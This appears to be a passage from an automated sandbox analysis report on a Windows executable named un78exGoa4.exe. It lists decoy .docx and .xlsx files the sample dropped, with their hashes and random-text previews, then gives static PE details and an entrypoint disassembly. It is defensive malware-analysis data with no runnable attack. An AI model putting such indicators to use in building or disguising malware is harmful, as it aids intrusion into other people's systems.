Preview:	HVLFEFMHHBAZDOLLZUNPNIMHDSYDQCISTUECHUCHKIAZZFSVBOELUIHPSHSXTNSPZDGIETMGXZOYQTZRMDJQFPHHJHCMEQAMYDDSLZLLUVDYXMVXMJISSAHCKPLCLDDBZUFIHVCCXHATRPSYNOHWXWJCDWDHDDSPCXHPEIXNETRDYBQVDZCZSCETYTSJIPSGEXYYNWAPSXUGLJGMVDMSILOBIVRFUBILUJUUFFXRNCZYXSQGJHKUDBDJGZWNGLJTNJADAFVOPOEFRDJKVPITPOGUIZYBSRBAAHELWONYMPDQZRAGDWEYGIKGSEGSKLXCRIXYVYCNLFAPZDPVJDSTOJJHRBYAFVUUHUPTGDCDAPEFBLYIAHZQXIZVAXOXOWQBKLVAPOMJLDTVBONRQXSZVABHXMVKXAHVBIWXPKRGZTDKAMPDAXSWNKCNNSMKKEECAANVALIIUEAXTYSXOKCYQYYXZTEBBANDVEICJYYAJPCRNGLJYSKLTEWKKIAXTZLKICCIAOQPAOQVEJXZPIYIXVSONSXMGRCKSVBNLNAKITKHATKVOAKZESLANUYNJSIOBTYYPZRGWXHMQEGVVXXRBNEVVYRTZWBSBZXBCTWATGHIYCHGUZXZLMYYHKVDAYMGQCLNOREHTSWUSWKHGEHRJJXNCAWTDRWOVTMGLOTCFSEWPQOLOOKFURNEANRYAOHFWBHJZKWTCLPCRLHHDVHKOLGCJQPRJFRUIBVIZISBXZQXHSJNMVPMLGKPIUUWWSDCKSOOKYNCPBNMWIEHWOTNUZYEZNJPVYKEUWDEEGMHFTVODLUKMYGXMOIQNSORSIJQDOIDNLRNHVCEAJNRJTMHQTNPWKWGMSDSPCXTWTIXGFTYXSNTASOZIBWKTZVHVXHWDZNBVOJXKIZAIZOUVEGBNGHYRGUKVNBWAJQMCAZRJGMOBMXLQXXVXCKJKYVDWBTSZUJDTZUKJCTZDHHLCOTJGUSHFTFJZNKKTJVWMSES

C:\ProgramData\JDDHMPCDUJ.docx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\ProgramData\KLIZUSIQEN.docx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\ProgramData\KLIZUSIQEN.xlsx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\ProgramData\QCOILOQIKC.docx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697125102277996
Encrypted:	false
SSDEEP:	24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
MD5:	207485EFCE70435971C31586A1E4CF97
SHA1:	245A410AEB767B099944A8E81F75FC9A4B270DFB
SHA-256:	BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
SHA-512:	A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
Malicious:	false
Preview:	QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

C:\ProgramData\QCOILOQIKC.xlsx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697125102277996
Encrypted:	false
SSDEEP:	24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
MD5:	207485EFCE70435971C31586A1E4CF97
SHA1:	245A410AEB767B099944A8E81F75FC9A4B270DFB
SHA-256:	BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
SHA-512:	A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
Malicious:	false
Preview:	QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX

C:\ProgramData\SNIPGPPREP.xlsx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701796197804446
Encrypted:	false
SSDEEP:	24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
MD5:	C8350CE91F4E8E8B04269B5F3C6148DA
SHA1:	22D523A327EBAF8616488087E2DCE9DBD857F0CC
SHA-256:	1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
SHA-512:	C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
Malicious:	false
Preview:	SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

C:\ProgramData\TQDFJHPUIU.docx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697771666106845
Encrypted:	false
SSDEEP:	24:TwdgExX6lswcsA1Wo1+js3mQmFlw2UJh6QHssg9RGVQ8:T6KiV+KmQmFwhtMp9RGVH
MD5:	D910958AF930D9DCA27D8F529EC053D0
SHA1:	321478679C760C347743149A323469AD4BFEA87D
SHA-256:	C70010ABE33AC34A7DB2F84B5ECDEA5EF95D482B69138707C126D2C1C1B67F37
SHA-512:	0BCADFF480F8F0C7E5DDC316F678564A75785640F151ACA644CABE64AD10D0D4AD6156385A4B04DF9025C6ADCDB3787123EC21F57610F1A7FBC7727A12EB8A00
Malicious:	false
Preview:	TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC

C:\ProgramData\ZIPXYXWIOY.xlsx

Download File

Process:	C:\Users\user\Desktop\un78exGoa4.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697427014915338
Encrypted:	false
SSDEEP:	24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
MD5:	2D7ACA56B5F340F28DD1D2B46D700BA6
SHA1:	3966684FF029665614B8DC948349178FB9E8C078
SHA-256:	B227E5E45D28AC063349BC70CC01A3F6DB15C101432A8609E0202064F7E5936D
SHA-512:	D4BFC2BB839DAEBAE8C894A0B8EB2314D2BE0304C82EB89BE16D6C820874952534CE0D93AE62EEF3DD2BE8A4D1E828B883E50BD204D04624AB945119D2FAB4F0
Malicious:	false
Preview:	ZIPXYXWIOYFFJDUIEBFLHIUBYNNMJGYPFQONGOLQHGMFRFYQGSVGNDSCQJYWDCIKWJWNYHFUEMJVEPAFIPAROVFAVARCOHESRJKUIUYDXNZOERBEQGHQNKYMVMEEMKKKEYXXPAKWYGCIXNFSVDOOEUTNGSDXMYEZKQTRDCZXZXIFSRMNAEPZWJKKYULUPGZCQORNOJBGAAOPLYNJCPFWSASJWTLALTQZLWOGFWQVOXGYBCMNEBDESHLNZZBETDIGNLTNPZEPEQAMYCNYWEKKQKDVZPNYLWAFZIPSSVNHOPUMIBTFXVVCNCPUSOKETVBDNZLCRKBRLGSHFSQLECHUOWGFFEMDWHASNSMAXKZZMDLZVQLADFBDUCCIJERQXKRXUCTKGDGKPESHHXUPKZSGNKOITMVITFCBELJVTCKENQCMCJEDZJDQDSKAYFGQEYICXDUOIJRYIMVXRKNBYXQEHUHYSPGEDSJBOQNXHFTSSRTPOXDVFXEPQUGWNEAKZJOKYPEYKXMOMKTKOBVISHMUGELPJCXBYNEXOAWOXHSEELVSCFMZYAMOLTGIWURMTZTRNGMWQZBRQHAIXVJIAFPZGWJZIOQLOAXJSGKMZNZCAVJWFGUFMQWQICMPVNAYRUHAMQLWLJMBERSFPEZHMNVAZFQAJEGYJQOMQWFTQVXZYTDPYVGZZPSNSOJWWKZDRPZKGTXYSENWOIQFXDIRWPJEYALOOEYQPHOPKSIZFNHPOXOKSTDVPNBSCDDKPOUVXMFBUNBMEUYGOSYMHMUNKKADTAEIUEMXYPOPMUVBHTBVKYAHHJXFUJPFZJZARAFLARBIWKXMNKXJLVBLJSZYYVIBZHROONQENYZGGMMETTMOFHCCQNUHPDEUTVVGUDBCKVXVUMRWPGZIPPUXJEJQIEQWLBUQBUODMWPSBFOYIQZWMYWPHWSKTRCKCRXWZUOTDTDRLLUSSQZXZZEATFSHBUWQUYHDLRMVVWFCPAZNSBXA

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.486309125722837
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	un78exGoa4.exe
File size:	297472
MD5:	84f304e30439cf1f837ed4f31c1fbb28
SHA1:	257518ece774da6ba53ca070121a206519f0c229
SHA256:	cb7f4e286a4a8fdfa525168591131d37019090d94040feb13c8078c4a7ae4b37
SHA512:	2fb76cd9feab5a1db8ed728f9c9a158eac97f658adb962d77bd27b1055e8ca48b2b14724871b5964d181f42bb74a51b36269a18061078f57f17fae158c81ba3e
SSDEEP:	3072:Ad9jDaSlXbBp6mLpIlYUEjOyv+L5bIWw7az/5QtGvAUd:qDakXmmL0CuLhIPtI
TLSH:	DB542A0396E2FC50ED668A729E2FC6EC779EF5508E19775A2118AE1F0C702B2D173712
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...\|.......\|.......\|...H...EX..k...b.......\|...c...\|...c...\|...c...Richb...................PE..L......b...........

File Icon


Icon Hash:	4d45454d6545691d

Static PE Info

General

Entrypoint:	0x404e79
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6296E609 [Wed Jun 1 04:07:37 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d683fcb523ac92743f5db043ced73806

Entrypoint Preview

Instruction
call 00007F87B4AF1963h
jmp 00007F87B4AECFFDh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F87B4AED1A6h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F87B4AED1D0h
test ecx, 00000003h
jne 00007F87B4AED171h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F87B4AED16Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F87B4AED1B4h
test ah, ah
je 00007F87B4AED1A6h
test eax, 00FF0000h
je 00007F87B4AED195h
test eax, FF000000h
je 00007F87B4AED184h
jmp 00007F87B4AED14Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 004012D8h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x28318	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26f000	0x1b4b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x28b000	0xdfc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1220	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3190	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27dd4	0x27e00	False	0.7861542417711599	data	7.580309216292186	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x29000	0x245844	0x1e00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x26f000	0x1b4b0	0x1b600	False	0.3575110587899543	data	4.288893910573521	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
